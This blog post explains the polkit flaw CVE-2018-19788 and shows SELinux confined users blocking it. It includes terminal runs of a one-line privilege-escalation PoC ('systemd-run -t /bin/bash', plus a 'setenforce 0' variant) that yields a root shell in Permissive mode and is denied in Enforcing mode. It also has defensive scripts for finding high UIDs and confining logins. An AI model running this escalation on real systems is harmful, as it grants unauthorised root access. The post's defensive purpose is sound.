Polkit CVE-2018-19788 vs. SELinux

Hi All,

Last month I wrote about the Xorg X server vulnerability, and now there is another interesting one, this time in PolicyKit (polkit).

The exploit is based on a bug in PolicyKit (CVE-2018-19788): a user whose UID is greater than INT_MAX (2147483647) can successfully run any systemctl command, and with systemd-run that means a root shell. The UID does not fit in the signed 32-bit integer polkit's code uses for it, which is why the PoC output below shows uid 4000000000 reported as -294967296.
For more details, see The Hacker News article on thehackersnews.com.
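To make the number in the PoC output concrete, here is an added example (not part of the original post or of polkit) that narrows a UID to a 32-bit signed integer the way a gint would, and scans passwd-format lines for accounts whose UID is above INT_MAX. The passwd entries are constructed sample data; on a real system feed it /etc/passwd (or getent passwd) instead.

```bash
#!/bin/bash
# Added example, not code from the post or from polkit.
# Shows what a uid above INT_MAX looks like once it is narrowed to a 32-bit
# signed int, and lists passwd entries that have such uids.

INT_MAX=2147483647

# Narrow an unsigned 32-bit uid to a signed 32-bit int (two's complement),
# the way a uid_t value ends up in a gint: values above INT_MAX go negative.
narrow_to_gint() {
    local u=$(( $1 & 0xFFFFFFFF ))
    if [ "$u" -gt "$INT_MAX" ]; then
        echo $(( u - 4294967296 ))
    else
        echo "$u"
    fi
}

# Read passwd-format lines on stdin and print "name:uid" for every account
# whose uid does not fit in a signed 32-bit int.
list_high_uids() {
    awk -F: -v max="$INT_MAX" '$3 + 0 > max + 0 { print $1 ":" $3 }'
}

# Constructed sample passwd entries (not a real system's /etc/passwd).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
tester:x:4000000000:1012::/home/tester:/bin/bash
nobody:x:65534:65534::/:/sbin/nologin'

echo "uid 4000000000 as gint: $(narrow_to_gint 4000000000)"   # -294967296
printf '%s\n' "$SAMPLE_PASSWD" | list_high_uids                # tester:4000000000
```

The -294967296 printed for the tester account is exactly the value GLib complains about in the PoC run below; the scan is a quick way to find out whether any local account is in the affected UID range.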

How does SELinux handle this exploit? 🙂 Let’s see.

SELinux has a very powerful feature called confined users, which lets administrators restrict what a Linux login can do by mapping it to a confined SELinux user (user_u in the runs below, which puts the login's processes in the user_t domain). See the official Fedora documentation or Dan Walsh's blog. This feature is not enabled out of the box: on a default install logins are mapped to unconfined_u, so it has to be configured on an SELinux-enabled system.
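As an added example (not from the post or the Fedora documentation), the following script wraps the two steps an administrator needs: mapping a login to user_u with semanage(8), and checking which logins are still unconfined. The confine_login function calls semanage and must be run as root on an SELinux system; the audit function only processes text, so it is exercised here on a constructed sample of semanage login -l output rather than a live machine.

```bash
#!/bin/bash
# Added example, not code from the post. Maps a login to the confined SELinux
# user user_u and audits which logins are still mapped to unconfined_u.

# Map (or remap) a login to an SELinux user; default is user_u, the user shown
# in the post. The new mapping applies at the user's next login.
confine_login() {
    local login="$1" seuser="${2:-user_u}"
    if semanage login -l | awk 'NF >= 2 && $1 != "Login" { print $1 }' | grep -qx "$login"; then
        semanage login -m -s "$seuser" "$login"   # mapping exists: modify it
    else
        semanage login -a -s "$seuser" "$login"   # no mapping yet: add one
    fi
}

# Given `semanage login -l` output on stdin, print the logins mapped to
# unconfined_u. Skips the header line and blank lines.
unconfined_logins() {
    awk 'NF >= 2 && $1 != "Login" && $2 == "unconfined_u" { print $1 }'
}

# Constructed sample of `semanage login -l` output (Fedora layout; not
# captured from the post's machine). __default__ is the mapping every login
# without its own entry gets, so unconfined_u here means new users are unconfined.
SAMPLE_LOGINS='Login Name           SELinux User         MLS/MCS Range        Service

__default__          unconfined_u         s0-s0:c0.c1023       *
root                 unconfined_u         s0-s0:c0.c1023       *
system_u             system_u             s0-s0:c0.c1023       *
tester               user_u               s0                   *'

printf '%s\n' "$SAMPLE_LOGINS" | unconfined_logins   # prints __default__ and root

# Real use, as root:
#   confine_login tester              # one login, as in the post
#   confine_login __default__         # every login without its own entry
#   semanage login -l | unconfined_logins
```

Remapping __default__ is the way to confine all ordinary users at once; leave root and any service accounts that genuinely need unconfined_u as explicit entries, and remember that a user who is already logged in keeps the old context until they log out and back in.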

Let’s first run the PoC in Permissive mode, when the SELinux policy is loaded but not enforced (denials are only logged):

[tester@localhost ~]$ getenforce
Permissive
[tester@localhost ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0
[tester@localhost ~]$ systemd-run -t /bin/bash

(pkttyagent:7036): GLib-GObject-WARNING **: 15:39:20.472: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:156:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Running as unit: run-u3748.service
Press ^] three times within 1s to disconnect TTY.
[root@localhost /]# id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

As you can see, the PoC gives me a root shell with one command: the GLib warning and the pkttyagent assertion failure are the overflowed UID showing up, but systemd still starts the transient unit. Let’s repeat it with SELinux in Enforcing mode:

[tester@lvrabec-workstation ~]$ getenforce
Enforcing
[tester@lvrabec-workstation ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0
[tester@lvrabec-workstation ~]$ systemd-run -t /bin/bash

(pkttyagent:7243): GLib-GObject-WARNING **: 15:42:05.436: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint'
**
ERROR:pkttyagent.c:156:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)
Failed to start transient service unit: Access denied

[tester@lvrabec-workstation ~]$ id
uid=4000000000(tester) gid=1012(tester) groups=1012(tester) context=user_u:user_r:user_t:s0

What does this mean? SELinux blocks this exploit, because the confined user domain (user_t) is not allowed to start systemd units. Polkit fails in exactly the same way, but when systemd (running as init_t) checks whether user_t may start a unit, the policy says no and the denial is logged. Here is the audit record, from a run where the PoC payload was setenforce 0 instead of /bin/bash; the denial is the same:

----
time->Sun Dec 9 15:43:17 2018
type=USER_AVC msg=audit(1544366597.713:2394): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='avc: denied { start } for auid=4000000000 uid=4000000000 gid=1012 cmdline="systemd-run -t setenforce 0" scontext=user_u:user_r:user_t:s0 tcontext=system_u:system_r:init_t:s0 tclass=system permissive=0 exe="/usr/lib/systemd/systemd" sauid=0 hostname=? addr=? terminal=?

It looks like it’s the right time to confine users on your systems! 😉

Thanks to @paragonsec for the one-liner PoC.